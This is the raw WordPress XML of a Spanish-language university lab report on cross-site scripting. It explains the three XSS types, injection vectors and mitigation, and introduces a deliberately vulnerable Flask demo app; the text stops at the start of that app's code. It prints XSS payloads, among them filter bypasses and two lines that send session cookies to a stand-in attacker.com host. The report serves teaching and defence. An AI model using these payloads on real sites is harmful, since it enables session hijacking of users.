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b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Universidad Politécnica de Querétaro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ingeniería en Sistemas Computacionales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">PRÁCTICA 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS (Cross-Site Scripting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="505050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipos, Explotación y Mitigación</w:t>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F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Seguridad Informática</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prof. Javier Moya Moya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Alumno: Jesús | ID: 123048152 | Grupo: S-203</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Querétaro, Qro. — Junio 2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Introducción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El Cross-Site Scripting (XSS) es una vulnerabilidad de seguridad web que permite a un atacante inyectar código malicioso (generalmente JavaScript) en páginas web visitadas por otros usuarios. Según el OWASP Top 10, el XSS ha sido históricamente una de las vulnerabilidades más prevalentes en aplicaciones web, clasificada actualmente dentro de la categoría A03:2021 Injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta práctica tiene como objetivo comprender los tres tipos principales de XSS, demostrar su explotación en un entorno controlado y aplicar las técnicas de mitigación más efectivas.</w:t>
      </w:r>
    </w:p>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2. Tipos de XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 XSS Reflejado (Reflected XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El XSS reflejado ocurre cuando el servidor recibe datos maliciosos en una solicitud HTTP (comúnmente mediante parámetros GET o POST) y los devuelve inmediatamente al cliente sin sanitización. El script no se almacena en el servidor; para ejecutarse requiere que la víctima haga clic en un enlace especialmente construido.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TIPO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="81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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No persistente — El payload viaja en la URL o en el cuerpo de la solicitud y se refleja en la respuesta HTML.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de URL maliciosa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">http://sitio.com/buscar?q=&lt;script&gt;document.location='https://attacker.com/steal?c='+document.cookie&lt;/script&gt;</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2.2 XSS Almacenado (Stored XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">También llamado XSS Persistente, este tipo ocurre cuando el payload malicioso se guarda en el servidor (base de datos, archivos de log, comentarios, etc.) y se sirve a todos los usuarios que carguen la página afectada. Es el tipo más peligroso porque no requiere interacción directa de la víctima con el atacante.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8B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PELIGRO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="81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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistente — El script se ejecuta automáticamente para TODOS los visitantes de la página infectada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Escenario típico: un campo de comentarios que guarda HTML sin sanitizar en la base de datos. Cualquier usuario que visite la sección de comentarios ejecutará el payload.</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2.3 XSS basado en DOM (DOM-Based XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este tipo se produce íntegramente del lado del cliente. El servidor entrega HTML legítimo, pero el código JavaScript del sitio manipula el DOM usando datos no confiables como window.location, document.URL o document.referrer, escribiéndolos con métodos inseguros como innerHTML.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DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="81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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">El servidor no interviene — el ataque ocurre en el navegador. Los logs del servidor pueden no registrarlo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo vulnerable en JavaScript:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// ❌ VULNERABLE:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">document.getElementById('msg').innerHTML = location.hash.slice(1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// ✅ SEGURO:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">document.getElementById('msg').textContent = location.hash.slice(1);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Reflejado</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Almacenado</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DOM-Based</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Persistencia</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Afecta a</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Víctima específica</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Todos los usuarios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Depende del cliente</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Origen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URL / formulario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Base de datos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API del DOM</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Detectado por servidor</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necesariamente</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Peligrosidad</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Media</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Alta</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Media-Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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3. Cómo se inserta un script malicioso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un atacante busca puntos de entrada donde la aplicación refleje o almacene datos sin sanitizar. Los vectores de inyección más comunes son:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Vectores de inyección</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parámetros GET/POST en URLs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Campos de formularios (nombre, comentario, búsqueda)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cabeceras HTTP (User-Agent, Referer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fragmentos de URL (hash #, usado en DOM XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Datos importados de APIs externas sin validar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Payloads fundamentales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Script básico — verifica si el sitio es vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass usando onerror — evade filtros que bloquean &lt;script&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror="alert(document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector SVG — soportado en HTML5:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;svg onload="alert('SVG XSS')"&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Robo de cookies de sesión — payload funcional malicioso:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  new Image().src = 'https://attacker.com/steal?c=' + document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass de filtros con mayúsculas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>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4. Aplicación de demostración (BlogApp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para esta práctica se desarrolló BlogApp, una aplicación web en Python Flask que implementa intencionalmente las tres variantes de XSS. Cada ruta demuestra el ataque y su mitigación correspondiente.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00"/>
        <w:gridCol w:w="286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Ruta</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Vulnerabilidad</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Mitigación aplicada</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/vulnerable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Reflejado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render_template_string sin escape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Ninguna — demostración</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/seguro</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Reflejado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(mitigado)</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escape() + CSP + headers</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/almacenado</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Almacenado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Comentarios en memoria sin sanitizar</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Ninguna — demostración</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DOM-Based</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innerHTML + location.hash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Comparativa textContent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Código vulnerable (ruta /vulnerable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El siguiente fragmento muestra el código que produce la vulnerabilidad de XSS reflejado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ VULNERABLE — app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
